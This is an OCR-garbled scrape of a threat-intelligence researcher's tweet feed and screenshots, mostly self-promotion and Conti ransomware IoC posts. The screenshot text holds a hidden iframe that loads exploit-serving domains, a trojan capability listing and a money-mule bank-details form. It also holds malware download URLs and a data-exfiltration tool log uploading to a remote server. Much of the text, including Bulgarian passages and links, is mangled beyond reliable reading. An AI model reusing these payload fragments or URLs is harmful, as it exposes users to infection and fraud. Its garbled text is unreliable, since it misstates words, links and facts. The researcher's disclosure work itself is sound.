announced the relaunch of the website under the 
domain name box.sk. It is designed to support 
hackers and cybersecurity experts. |"! 


v Notes 


v Translation 


x 


Be HUNGARIAN ENGLISH 


09:45 
My BIO. #threatintel https://t.co/d8vpXoaAgY 
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12 - Monday 
08:53 


Dancho Danchev is the world's leading expert in the field of 
cybercrime fighting and threat intelligence gathering having 
actively pioneered his own methodology for processing 
threat intelligence leading to a successful set of hundreds 
of high-quality analysis and research articles published at 
the industry's leading threat intelligence blog - ZDNet's Zero 


Day, Dancho Danchev's Mind Streams of Information Security 


Knowledge and Webroot's Threat Blog with his research 


featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 


TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and 
is currently considered one of the security industry's most 
popular security publications. 


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse" 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

- Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 

- My old Twitter Account got 11,000 followers 

- | had an average of 7,000 RSS readers on my blog 

- | have my own vinyl “Blue Sabbath Black Cheer / Griefer - 
We Hate You / Dancho Danchev Suck My Dick” made by a 
Canadian artist 

- Currently running Astalavista.box.sk 

- | gave an interview to DW on the Koobface Botnet 

- | gave an interview to NYTimes on the Koobface botnet 

- | gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


He's currently running a high-profile hacking and s' 
project on the original https://astalavista.box.sk an 


reached at dancho.danchev@hush.com 


My latest white paper for @whoisxmlapi - https://t.co/2 UDbwyWGHX #Threatintel 


08:56 


My latest white paper for @whoisxmlapi - https://t.co/nRSed5Em5f 


08:57 


My latest white paper for @whoisxmlapi - https://t.co/HdOgKjOMGu 


08:58 


My latest white paper for @whoisxmlapi - https://t.co/EKQs7nwSd1 
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13 - Tuesday 


06:47 
My latest white paper for @whoisxmlapi enjoy! https://t.co/gRLYExuCBq 


10:31 
Anyone hiring? 


10:56 


Amazon Kindle users! Check this out! 13 free volumes - https://t.co/txm7fqDihC of 
my https://t.co/JTcqOaYgET and counting! Happy reading. #security #cybercrime 
#malware #cybersecuritytips #cyberthreats #cyberintelligence #cyberattacks 
#Threatintelligence https://t.co/X9TDm2Yj0Ox 


21 *l1 
RESULTS 
Dancho Danchev’s Personal Security Hacking and Cybercrime Research Memoir Volume 02: An In-Depth 
Picture Inside Security Researcher's Dancho Danchev Understanding of Security Hacking and Cybercrime 
Kindle Edition 
£0) sinicurteined 
Aeailabbe instantly 
£4 
Dancho Danchev’s Personal Security Hacking and Cybercrime Research Memoir Volume 01: An In-Depth 
Picture Inside Security Researcher's Dancho Danchev Understanding of Security Hacking and Cybercrime 
by Danche art M P 
Kindle Edition 
‘9 tp Seurterted 
Available instantly 
Dancho Danchev’s Personal Security Hacking and Cybercrime Research Memoir Volume 07: An In-Depth 
Picture Inside Security Researcher's Dancho Danchev Understanding of Security Hacking and Cybercrime 
by Dancho Danct 10M 
Kindle Edition 
£Q hivteurte ted 
Availabse instantly 


My latest white paper for @whoisxmlapi. Enjoy! https://t.co/6abLUIrT8i 


14 - Wednesday 


00:37 


My "Cyber Threat Actors OSINT Analysis for 2021". - https://t.co/gTZ1bJEDvm always 
yours at https://t.co/JTcqOaYgET enjoy and feel free to share! 
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00:42 


My "Conti Ransomware Group OSINT Analysis for 2022" - https://t.co/otelaow7dp 
always yours at https://t.co/JTcqOaYgET enjoy and feel free to share! 


17 - Saturday 


19:51 


Folks. This is Dancho (https://t.co/JTcqOaYgET). I’m proud to introduce the Web’s first 
and the security industry and #OSINT community’s first crypto currency enabled 
marketplace for buyers and sellers of OSINT. Drop me a line at 
dancho.danchev@hush.com https://t.co/wKWjoTDUOs 


Om 


OSINT MARKETPLACE 


18 - Sunday 
00:03 


"Sharing is caring". Drop me a line today at dancho.danchev@hush.com and request 
your invitation to buy and sell your OSINT research on the Web’s primary destination 
spot for #OSINT researchers and buyers of OSINT research on cyber threat actors. 
https://t.co/4Ekz9VqDFC 
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IC 
On 


OSINT MARKETPLACE 


05:33 
https://t.co/JTcqOaYgET https://t.co/m2TCaxXp3sZ 


CONFERENC 


whens 


19 - Monday 


04:25 
My latest white paper for @whoisxmlapi - https://t.co/100jzZDTvq Enjoy! 


*1 
05:53 


My latest white paper for @whoisxmlapi - https://t.co/AgPUHBWU1h Enjoy! 
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20 - Tuesday 


03:02 
My latest white paper for @whoisxmlapi - https://t.co/COSmdVxzKY 


03:22 


https://t.co/GOvJRHpUfx #security #cybercrime #malware #ThreatHunting 
#Threatintelligence 


10:42 
My latest white paper for @whoisxmlapi - https://t.co/g84nMXIf98 Enjoy! 


22 - Thursday 


21:23 


Folks. I’m just about to launch my newly branded and about to dazzle you with 
content "Dancho Danchev’s Dark Web Content Media Empire" - 
https://t.co/Pr43QvrLNq Here’s a preview. Guess what? There’s more to come. Visit 
us today and stay tuned! RT pls. https://t.co/QQS3C0eZex 


*1 


24 - Saturday 


04:10 


Be3nnatTHo Konve oT Memoap-a - https://t.co/kjEQQO0VQGc [PDF] 6e3nnatHa aygauno 
KHura - https://t.co/P9FAOWVQgX [MP3] opuruHan-a Ha AHPUNCKY TyK - 
https://t.co/qLxz4GuRip [PDF] YaoBonctBueto e u3uqA0 Moe! Mo3zgpasu. Danyo. 
https://t.co/IODRypLeMC 
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A pPpccecrbpniicnh#sA © KCC HPT Tyo 


06p a 6,0%k aH ay i wh) orp 2 Hea, c 


h yOu h YH Hot OA Wap 
yu4NactBpan Bp CTpoPro Ceiypefua 
iporppama 3a xakepu Ha 
BbpuhanckKoy-Pasy3naBbane 
MLOAABPKa (Hah ~H3BECCTHHA 
670T 38 CHE YpHOCT H KH GEP 


&2Tau’ B CBCTA 


"Toca ¢ mone fu nai-cxuameanua bracapena ba02r 
6.cecmoeém Mamaéb se chepama na mexnuuecka 


Carppnocm" 


https://ddanchev. blogspot.com Email: dancho.danchev@hush.com 


16:16 


https://t.co/JTIcqOaYgET #security #cybercrime #malware #cybersecuritytips 
#cyberwar #ThreatHunting #threatintelligence #threatintel https://t.co/jxETrNvFE4 
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Aggregate Item Use Show stats for | alltime 


2010 2015 


Wednesday, December 14, 2005 — Saturday, September 14, 2019 
* 2,572,020 views of 1038 items 
7 6,497,440 Clicks back to the site on 1217 items 


25 - Sunday 


11:24 


https://t.co/JTcqOaYgET | https://t.co/n6Lihftim3 | https://t.co/OmUajr8DT8 #security 
#cybercrime #malware #cybersecuritytips #CyberSec #ThreatHunting 
https://t.co/2kspRXpfHh 
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Welcome to the community-driven and commercial WhoisXML API 
OpenCTI instance where we aim to offer a novel and unique peek 
inside the modern threat landscape on a daily basis through the 
machine-readable communication of novel attack techniques 
including TTPs (Tactics Techniques and Procedures) including all 
the relevant and real-time processed loCs (Indicators of 
Compromise) for current and ongoing cyber attack campaigns and 


currently circulating malicious software spam and phishing 
campaigns spreading rogue and fraudulent online campaigns. 
Inquire about your API key here - https://threat- 
intelligence.whoisxmlapi.com/nautilus-feed or send a message to 
research@whoisxmlapi.com 


26 - Monday 


04:21 


Got some cybercriminals coming your way? Send all the spam phishing and 
malicious software my way. | promise that I'll take a moment of my time and process 
this. Thanks mother for the shot. Don’t mock me about where all that beer is going. 

Regards. Dancho https://t.co/uU6NbaqmYUv 
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27 - Tuesday 


08:50 


https://t.co/vgkBxFCBUQ | https://t.co/JTcqOaYgET | https://t.co/UZ6qVANXVF | 
https://t.co/ZOwW9r2oiV | https://t.co/Vv4nwa4tzj | https://t.co/sMWCGUWRé6g | 
https://t.co/OmUajr8DTS8 | https://t.co/nNSXMPrGi0 Enjoy! #Threatintel 
#Threatintelligence https://t.co/JAOodZm1tz 
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28 - Wednesday 


11:27 


Awesome! - https://t.co/eole2BVFY3 #security #cybercrime #malware 


9) Dancho Danchev 
f ‘ 


Researcher 


Dancho Danchev is an independent security 
consultant and cyber threats analyst, with 
extensive experience in open source intelligence 
gathering, and cybercrime incident response 


https:-//www zdnet.com > meet-the-team » ddanchev 
Dancho Danchev | Meet the Team - 
ZDNET 


@ Claim this knowledge panel Feedback 


#Threatintelligence #threathunting Always yours at - https://t.co/JTcqObfRwr Stay 


tuned! https://t.co/KEPXOXy5Tq 
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potekhini4@bk.ru 
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agressivex.com 


ANDROID 
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com.example.livemusay.myapplica... 


isl 


Who remembers this and my "In Retrospective" blog post series at - 
https://t.co/JTcqOaYOur? Stay tuned! The best is yet to come! Regards. Dancho 
https://t.co/U7uUETwu8v2 
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HNNCast052110 


Ei Like Share ¥ Flag as objectionable or broken - 1 Views - 1 Collector 


11:32 


This is in retrospective to my previous tweet. Here’s the public reference - 
https://t.co/PZjpuOGmyYi #ThreatIintelligence #threathunting always yours at 
https://t.co/JTcqOaYOur Stay tuned! https://t.co/quCGGRw53w 


11:34 


My BIO - https://t.co/JTcqOaYOur stay tuned! #Threatintelligence #threathunting 
https://t.co/IfJ/LldThz6 
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Background 


| was born in Sofia, Bulgaria. My primary area of 

occupation since the early 90's is computers. My 

— work is Disruptive individual's Chief 
xecutive Officer (CEO) 


Dancho 
Danchev Executive BIO 


Warindustries - Member 

BlackCode Ravers - Member 

Black Sun Research Facility - Contributor 
DiamondCs - List Moderator/Software Contributor 
LockDownCorp - Help Trojan Database Contributor 
Forbidden HelpNetSecurity - Contributor 
Astalavista Security Group - Managing Director 
Frame4 Security Systems - Contributor 
TechGenix - WindowSecurity - Contributor 

ZDNet Zero Day - Security Blogger 

Webroot Threat Blog - Security Blogger 


Conference and Events - Media and Press Coverage 


Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat intelligence gathering 
having actively pioneered his own methodlogy for processing threat intelligence leading to a successful set of 
hundreas of high-quality anaysis and research articles published at the industry's leading threat intelligence blog - 
ZONet's Zero Day, Dancho Danchev's Mind Streams of Information Security Knowledge and Webroot's Threat 
Blog with his research featured in Techmeme, ZDNet, CNN, PCWortd, SCMagazine, TheRegister, NYTimes, CNET, 
ComputerWorld, H*Magazine currently producing threat intelligence at the industry's leading threat intelligence 

- Ss - Streams of Information Security Knowledge 


With his research featured at RSA Europe, CyberCamp, InfoSec, GCHQ and Interpol the researcher continues to 
actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's - 
MinStreams of Information Security Knowledge publishing a diverse set of hundreds of high-quality research 
analysis detailing the malicious and fraudulent activities at nation-state and malicious actors across the globe 


11:42 


Exclusive! This is from the "believe it or not but I’m positive that the source of this 
screenshot is real" department and hey they truly know how to say "hi" to me - 
https://t.co/mQWkOSpQgw #Threatintelligence https://t.co/evY6NKBsYD 
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Wholesale domain registration and internet services -- OnlineNIC Inc. - Mozilla Firefox 
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11:46 


Oops. | might get into "trouble" for posting this. | got an email recently and hence 
the result. Fans from across the globe unite. Hackers and diamonds are forever. 
Bulletproof hosting services courtesy of the RBN are eternal - https://t.co/JTcqOaYOur 
Thanks! https://t.co/LGO4PeULsa 


» =. o_o "i 
eons IE wer. 
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11:50 


Awesome! In retrospective. This is the Koobface Botnet attempting to serve 
client-side exploits to unsuspecting end users combined with scareware which | refer 
to as "double-layer" monetization. Guess who spread the word? - 
https://t.co/CSesdWfccy stay tuned! https://t.co/xnFfFVu980 


OF 98214.98.195/Ox0tt/view/co.  * 


Revapetaon 
© 99.214.96.195 0368 view /console=yes/?90 
cet 


vo help. html 


div id*“Layerl” style*“position:absolute: left: 0px: top: 0px: width: 100px: 
height: 100px; z-index:1; visibility: hidden:” 


<iframe srow*http://el3x.cn/testl3/index.php” widthe"1" height#"1"*></iframe> 
<iframe arc="http://kiano-180809.ccm/oko/heip.html" width="1*" 
height#"1"></iframe> 


11:53 
Awesome! - https://t.co/uFPivg61sO #security #cybercrime #malware 
#Threatintelligence https://t.co/ZBuqURAUrB 
11:55 


Recommended bed time reading? Check this out! - https://t.co/UZ6qVAI5Ld #security 
#cybercrime #malware #Threatintelligence https://t.co/F85ijlhy1s 
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Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understandin 
of Security Hacking an 
Cybercrime Incidents 


Dancho 


Danchev's 
Personal 
Security 
Hacking and 
Cybercrime 
Research 
Memoir 


11:59 


This is the infamous https://t.co/SSoKeadcyZ my workplace circa 2003-2006 under 
my management where | was acting as a Managing Director. The best and most fun 
time ever! Here’s a copy of the newsletter - https://t.co/PG1UftvEvS [PDF] Enjoy! 
https://t.co/gNAWkWgudk 
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12:02 


Home 


Top 10 Tools Security Directory Security News 


Tutorials Geeky Photos 


Links 


About Astalavista Sitemap 


Test your nctwork scourity from a hacker's point of view with GFi LANquard 1.5.5! 
Version 7 now offers anti-virus /anti-spvware checks & hybrid environment support - Download today! 


3.GB FREE! 


( search list } [ ene @ meersber } 
Astalavista.nct member 


Linking to) 

We are always 

Contact us. | 

Astalavista FAQ , read it before 

Interview with 2 core founder Our mission 
Asta’s Security Newsletter Monthly rele 
New to Astalavista.com? frst tee 


Danger: Authenticating ¢- mail can break it 

Novell in $72m seaurity management buy 
Telecommuting security concerns grow 

Kids outsmart Web filters 

We're winning the war against hackers 

Man fined $US84k in spyware case 

Yahoo accused of helping jad Internet writer 
Mozilla users urged to upgrade 

Microsoft to dose security updates on old Windows 


The Evolution Of Spy Toots 
Internet Explorer Virtualizer 


Social Engineering: The Biggest Risk to 
Internet Security 


Reversing Ransomware / Cyber 
extortion malicious code - video 


The Price of Restricting Vulnerability 
Publications 


Nodezilla 0.4.18 


LET - Layer Four Traceroute (LEFT) and 
Whos 


Brief analysis of security scam hijacker 
installation method 


5 Reasons to Choose Simple Sandboxing 
Debugging 101 

Web Application Scaurity Podcast 
Oracle Database Security 

An Economic Analysis of Airport Security 
Screening 

How to Encrypt BitTorrent Traffic 


Direct download copy available here - https://t.co/Iq12sbCOqM #Threatintelligence 
https://t.co/9YZDFGPlar 
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12:03 


Sender 1.03 
Sender 1.04 


coz 1.03 


Late Lras! 
GulF end 

GulFiend 1 
GulFend 1 


Database Viewer Copyright © 1999, Diamond Computer Systems Pty. Ltd. 


https://t.co/JTcqOaYOur #Threatintelligence https://t.co/hiZ52Me7ch 


SIZE: 124928 


REMOTE ACCESS TROJAN Portist 
Wor: E-MAR PROPAGATION 

Worm: IRC PROPAGATION 

KEYSTROKE LOGGER 

FTP SERVER 

PASSWORD GRABBER 

DESTRUCTIVE 

TARGETS SPECIFIC PROGRAMS 

STARTS EVERYTIME WINDOWS STARTS 


\Windows\Current¥er 


| The functions of this trojan are 


\RunServi 


Information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 
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- me 
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Servers Bog Seteworg Te Sas Fol 


12:06 


_— tanGecrtyTasmps 2QEPANT —, 


Second Life. Previous Life. Music is everywhere and so is the VuuV festival - 
https://t.co/OVOZgS5DIH stay tuned! https://t.co/WZKaRWUYIG 


12:09 


Awesome! Here are some screenshots from an on demand research study which | 
very good friend inquired about hence the results - https://t.co/EoqgHZobvUD 
992 


#Threatintelligence https://t.co/iPG7e3Ctlc 


WP: 92.19,213.191 
Domaier host-92-19-213-194 static as 13285.net 
Kingoom 


23:11 


A cyber warfare doctrine that’s aiming to prevent sensitive military secrets of leaking 
is forgeting some of the basics of information warfare - disinformation, or come and 
hack us, and steal our tweaked sensitive military secrets. 


23:12 


On purposely disinforming on the actual state of cyber warfare preparedness by on 
purposely suffering security breaches, then whining how they have managed to 
break in then whine how they did it. Outstanding! 


29 - Thursday 


10:25 
https://t.co/JTcqOaYOur #threatintelligence https://t.co/NOUOQLkDOy 
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10:41 


@campuscodi https://t.co/J/TcqQaYOur 


30 - Friday 


04:20 
https://t.co/JIcqOaYOur #threatintel https://t.co/7654Z)YfHr 
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04:20 
https://t.co/JTcqOaYOur #threatintel https://t.co/WGOjVLJTtb 
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https://t.co/JTcqOaYOur #threatintel https://t.co/aJgeVuyONT 
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https://t.co/ADWYDE11hN #NowPlaying Cheers! 
04:23 


https://t.co/JTcqObfRwr #threatintel https://t.co/wqFZfOK6f6 


You have new message. Read 


a John Blackmore 
Tasks | Messages | Mymoney | My Profile | Documents | Officialinvoices | Help | Quit 
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https://t.co/JTcqOaYOur #threatintel https://t.co/PW45YmcjLx 


C2 Transaction 136357 


09.01.2009 % 
High 18:46:50 — 
~ 09,01,2009 
@@ Transaction 136360 Done High 18:45:18 


https://t.co/TcqOaYgET #threatintel https://t.co/XFxKXEmQJt 
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https://t.co/JTcqOaYOur #threatintel https://t.co/mEJJLXyNM8& 
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@2r@eqo20q°2O0Q°Od 


Why are you gathering so much information about applicants? Such attention especially to bank account details puts me on guard. 


In fact that modern financial system is a complex instrument, which controls financial streams, The problem is that any transfer may 
be delayed (from 1 to 5 days) but it is unacceptable for our business. Transaction should be completed by a financial manager the 
same day money is deposited into the bank account. Othervise, we risk to lose money, clients, reputation. Analyzing all the details 
below we'll be able to prepare tasks for every agent individually. Please fill in all the fields carefully to avoid delays while working with 
your bank. The success of our cooperation depends on the accuracy of entered details! Please be serious. 


“You are responsible for reliability of this information. If you're having any difficulties please contact your bank, 


Banking Details 

Account Type (checking/saving)*: ~ select - vy) 
Name on the Account™: =z = ? 
secon Number CC]? 
Routing WumbarforAcn wanatess [—~«dP 
ee fd 
Transfer*: 

bate you opened yourbanieaceountss [——SSSSSSS—~d*i 
account?*: 

ts 9 orapad acount CC? 
Lae =? 
counter*: 

Have you ever used Western 

Union/Money Gram?*: 

en een 
area?™: 


04:25 
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TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/fFVIPqb9xiy 
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06:02 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/2qVqIMtjnp 
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TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/Rk5J43r3eu 
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TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/KVY26fuht7 
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06:03 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/zLOZ9Jfcl4 
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TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/WBMCdCj5Br 
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TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/bgcwZqPoAO 
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TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/FQW2wOLATO 
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TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/uUHOZyC3ab 
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TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/Y3uH4Rslt2 
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06:05 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/5hjosFKMyM 
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06:05 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/KO9AsxXrOse 
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06:06 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/sSTKMVizqox 
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06:06 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/feGlIEqGPDo 
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06:06 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/yQIN6Pqnqu 
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06:07 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/Gm9WDPfoSf 
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06:07 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/k9Q8Zsg8et 


1021 


06:07 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/OLAOMhIxsO 


1022 


06:07 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/S6XufuaGqx 
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06:08 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/Fo8sVOTdoy 


1024 


2 


earch diff 5 3 


7 


06:08 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/2ThkQ2d8za 
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06:08 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/g8a48Cl2Cd 
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Search diff =& 


06:08 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/G4DnCFsVsH 


1027 


os 
al 
-_ 
oe 
—_—_ 
~-. 
coe 
— 


06:13 
https://t.co/JTcqObfRwr https://t.co/8rGiZqTDKz 
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October 


4 - Tuesday 


01:27 


YTpe cbm B Coqbua, Besrapua 3a efHa KOH(epeHLNA Ha Tema KUGep CUrypHOcT. 
AKO Ce WHTepecyBaTe a ce BUAYM VU Ja Ce 3ano3HaeM Nuwerte Ha 
dancho.danchev@hush.com uv wwe cv ypeaum cpeusa. LLle ce BuauM Tam! No3gpasu. 
Ajanuo. - https://t.co/d2VpdRYa9I 


04:26 


What we play in the lab - https://t.co/JTcqObfRwr what’s your Steam ID? 
https://t.co/kdTrVMEVP7 
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Call of Duty: Modern Warfare 3 


ssw Sniper: Ghost Warrior 


6 - Thursday 


02:24 
https://t.co/JTcqOaYgET https://t.co/Sr3eKT4D5d 
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anek@Banchev's Blog - 
_.. Mind Streams.of 
Information Security 
ig Knowledge © 


04:24 
Who wants to ask me research questions for my upcoming Second Edition of my 
"Cyber Intelligence" memoir? 
05:47 


KOU UCcKa fa MU 3afaBa BbNpocu 3a BTOpoTO U3HaHue Ha MeMOap-a MU Ha 
Bbnrapcku "Ku6ep Pa3y3HaBaHe"? 


8 - Saturday 


00:07 


https://t.co/Bqbi2IDQOD #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #CyberSecurityAwareness #Threatintelligence 
#ThreatHunting #threatintel 


21 
21:54 


Who wants access to this? Regards. Dancho #security #cybercrime #malware 
#CybersecurityNews #CybersecurityAwarenessMonth #ThreatHunting 
#threatintelligence #threatintel https://t.co/Q9KI2qXFVn 
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9 - Sunday 


00:45 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/eqXvjcSilO 
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00:46 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/pKZurdNOi9 


rensport=pol LingSt=NEXEt-w net: :ERR_SSL_PROTOCOL_ERROR 
.1o/?ETO=38transport=pollingSt=NEXEt 2 net: :ERR_SSL_PROTOCOL_ERROR 
io/2EIO-38transoort-pollingSt=NEXEyDL met: : ERR_SSL_PROTOCOL_ERROR 
jo/ PET ranscort=pollingSt=NEXEvDT net: :ERR_SSL_PROTOCOL_ERROR 
i P : c -1o/2ETO=38transport=pollingSt=NEXEwR] net: : ERR_SSL_PROTOCOL_ERROR 

>GET nttos://212.129.41.246:6001/socket .jo/?EIO=36transport=pollingSt=NEXEwRt net: : ERR_SSL_PROTOCOL_ERROR 
>GET httos:// 9.4) 246-6 /sock 1o/?E1O«38transport=po) LingSt=NEXExe? met: :ERR_SSL_PROTOCOL_ERROR 


00:47 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
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Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/XPAkiIT7VNg 


€ cy & asggiheskbjg36bx.onion —~w Owe : 
Enigma 
end 
Ck © inspector G) Console © Debugger {} Ste Editor () Performance {f Memory fT Network [Ej Storage Fr Accessibility fi) «= 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/DUvyj6OPCz 


Confirmation code for RingCentral Operator #00020 
) ERROR: Update your Adobe Reader or try on another 
— computer, 


00:49 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/ikg3cXr6gv 
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SQLSTATE[42S22]: 
Column not found: 1054 


Unknown column 
‘api_token’ in ‘field list’ 


luminate\Database\QueryException 


Doctrine\DBAL\Driver\PDOException 


PDOException 


PDO prepare 


00:49 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/IG8f9k7Ipd 
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JSON Raw Data Headers 


Copy 


Response Headers 


Cache-Control no-cache, private 
Connection Keep-Alive 
Content-Length 2 
Content-Type application/json 
Date Mon, 29 Jun 2020 13:55:53 GMT 
Keep-Alive timeout=5, max=100 
Server Apache/2.4.2 (Win64) PHP/7.3.13 OpenSSL/1.0.1c 
X-Powered-By PHP/7.3.13 
X-RateLimit-Limit 60 
X-RateLimit-Remaining 59 


Request Headers 


Accept text/htmlapplication/xhtml+xmLapplication/xmtiq=0.9,"/*:q=0.8 
Accept-Encoding gzip, deflate, br 
Accept-Language en-US,en;q=0.5 
Connection keep-alive 
Host a3ggjhcskbjg36bx.onion 
Upgrade-Insecure-Requests 1 
User-Agent Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 


00:50 


Conti Ransomware Gang loCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/CiiAJFFANo 
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> SEARCH 


Languages Personal Privacy 


Learn how we process your data in our Privecy Policy. See the categories of date we process 


Updete 
. in our Product Policy 


Notifications 
Improvements 


Exceptions Share threat data with Avast to improve the security of all Avast antivirus 
Protection users (Community IQ) 


Blocked & Allowed 


Share app-usage data with Avast to help us with new product 
opps 


development. 
Password Share app-usage data with 3rd-party analytics tools to improve this app. 


Offers 


Share app-usage data with Avast so we may offer you upgrades or our 


Troubleshootis 
oo other products 


Share app-usage data with Avast so we may offer you 3rd party 
products. 


These settings apply only to Avest Business Antivirus 


00:50 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/lgiNKqxXOuw 


DecumentPreview42)-exe Failed - Virus detected x 


https://wwnw.omegasystemsuae.com/DocumentPreview.exe 


= https://app.pmtscr.com/build/setup-lightshot.exe 


Failed - Virus detected x 


https://allacestech.com/DocumentPreview.exe 


00:51 
Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
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courtesy of me - https://t.co/m49Cs5clc7 Front Page here - https://t.co/OmUajqR2uy 
Awesome! Research here - https://t.co/YLxOuf0jWV Awesome! 
https://t.co/b7B3u2ix6w 


Login pert 
Password ~~! Update Password 
Confirm Password f =. He cpaOatpigaet Ha HakaTn 
Commission's Rate 15.00 
Is Banned 


cx no Ps 


00:52 


Conti Ransomware Gang loCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/qshgvhysh3 


‘$16 /day+1 day up to 11:59PM 


00:53 


Conti Ransomware Gang loCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/xsesXF5Yge 
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00:53 
Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5clc7 Front Page here - https://t.co/OmUajqR2uy 
Awesome! Research here - https://t.co/YLxOufOjWV Awesome! 
https://t.co/OMeuKOIVUJ 
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2 
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00:54 
Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! 
https://t.co/7 LCUfvGKHN 
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EYLo 


netckaa onexga 


00:55 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! 
https://t.co/qgVCvwHMnx9 
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00:55 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/V2IqrEi9li 
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let’s get started 


00:55 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/IchOTItumS 


[+] WinSock initialized 

[+] I0 completion port initialized... 

Check server 139.680.168.206... 

[+] Server connected ... 

Stats: @ files “size 20.9 MB>, read speed 4.18 MB/sec ‘compression ra 
tio 91%>,. upload @ bytes/sec 

Stats: 71 files ‘size 529 MB>. read speed 26.4 MB/sec ‘compression ra 
tio 992%), 8.31 MB/sec 

Stats: 166 files “size 2.17 GB>, vead speed 27.8 MB/sec “compression 
ratio 99%). upload 22.9? MB/sec 

